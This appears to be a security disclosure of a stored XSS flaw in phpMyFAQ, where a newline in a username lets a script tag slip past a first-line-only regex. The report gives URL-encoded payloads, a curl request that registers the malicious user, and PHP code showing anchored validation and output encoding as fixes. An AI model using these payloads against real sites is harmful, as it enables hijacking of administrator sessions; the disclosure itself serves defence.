There is a stored XSS vulnerability due to improper sanitization of usernames.

Vulnerable code (User.php, line 532):
public function isValidLogin(string $login): bool
{
    $login = (string)$login;
    // Loose check: with the pattern used here, preg_match() only validates the
    // first line of the input, so anything after a newline is never inspected
    if (strlen($login) < $this->loginMinLength || !preg_match($this->validUsername, $login)) {
        $this->errors[] = self::ERROR_USER_LOGIN_INVALID;
        return false;
    }
    return true;
}
This code performs only loose filtering of the $login parameter because of how the preg_match function is used: it validates only the first line of the user input, so content after a newline is not checked at all. As a result, <script>alert(1)</script> is rejected as a username, but pwn\n<script>alert(1)</script> is accepted as a perfectly valid one. In URL-encoded form: pwn%0A%3Cscript%3Ealert(1)%3C/script%3E.
Because of this, attackers can supply URL encoded XSS payloads which would bypass the filter such as:
realname=pwn%0A%3Cscript%3Ealert(1)%3C/script%3E&name=pwn%0A%3Cscript%3Ealert(1)%3C/script%3
Later on, the user with the malicious username is inserted into the database. Finally, whenever an admin user visits the “List User page”, e.g. https://172-105-72-245.ip.linodeusercontent.com/phpmyfaq/admin/?action=user&user_action=listallusers, the admin/user.php file is executed and the attacker-supplied input is interpolated into the DOM without any sanitization:
<td><?= $user->getLogin() ?></td>
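The bypass and the two defensive fixes (anchoring the username pattern to the whole string, and HTML-encoding on output) as an added example; this is not phpMyFAQ's own code, and LOOSE_USERNAME is an assumed pattern that reproduces the first-line-only behaviour the report describes, not the project's actual $validUsername.

```php
<?php
declare(strict_types=1);

// Assumed weak pattern: anchored only at the start, so a valid first line satisfies it.
const LOOSE_USERNAME  = '/^[a-z0-9][\w.\-@]+/i';
// Hardened pattern: \A and \z pin the match to the whole string. Note that $
// (without the D modifier) still matches before a final "\n" in PCRE; \z does not.
const STRICT_USERNAME = '/\A[a-z0-9][\w.\-@]{1,63}\z/i';

// Mirrors the vulnerable check: length test plus a start-anchored preg_match().
function isValidLoginLoose(string $login, int $minLength = 2): bool
{
    if (strlen($login) < $minLength || !preg_match(LOOSE_USERNAME, $login)) {
        return false;
    }
    return true;
}

// Hardened check: the whole string must consist of allowed characters, so a
// newline (or any other character outside the class) makes validation fail.
function isValidLoginStrict(string $login, int $minLength = 2): bool
{
    if (strlen($login) < $minLength) {
        return false;
    }
    return preg_match(STRICT_USERNAME, $login) === 1;
}

// Output side: the admin listing must encode the login regardless of what
// validation accepted, replacing the raw <?= $user->getLogin() ?> sink.
function renderLoginCell(string $login): string
{
    return '<td>' . htmlspecialchars($login, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</td>';
}

// Constructed input taken from the report's payload (newline followed by a script tag).
$payload = "pwn\n<script>alert(1)</script>";

var_dump(isValidLoginLoose($payload));   // the loose filter accepts the payload
var_dump(isValidLoginStrict($payload));  // the anchored filter rejects it
echo renderLoginCell($payload), "\n";    // the encoded cell renders the tag as text
```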
PoC:

Issue the following request to create a user with a username of pwn\n<script>alert(1)</script>:
curl -i -s -k -X $'POST' \
-H $'Host: 172-105-72-245.ip.linodeusercontent.com' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Content-Length: 137' -H $'Connection: close' \
--data-binary $'lang=en&realname=pwn%0A%3Cscript%3Ealert(1)%3C/script%3E&name=pwn%0A%3Cscript%3Ealert(1)%3C/script%3E&email=kali%40kali.com&is_visible=on' \
$'https://172-105-72-245.ip.linodeusercontent.com/phpmyfaq/ajaxservice.php?action=saveregistration'
Now visit the “List all users page”: https://172-105-72-245.ip.linodeusercontent.com/phpmyfaq/admin/?action=user&user_action=listallusers
XSS Payload will be triggered.
Please see the occurrences section for a second unauthenticated stored XSS vulnerability via the name parameter.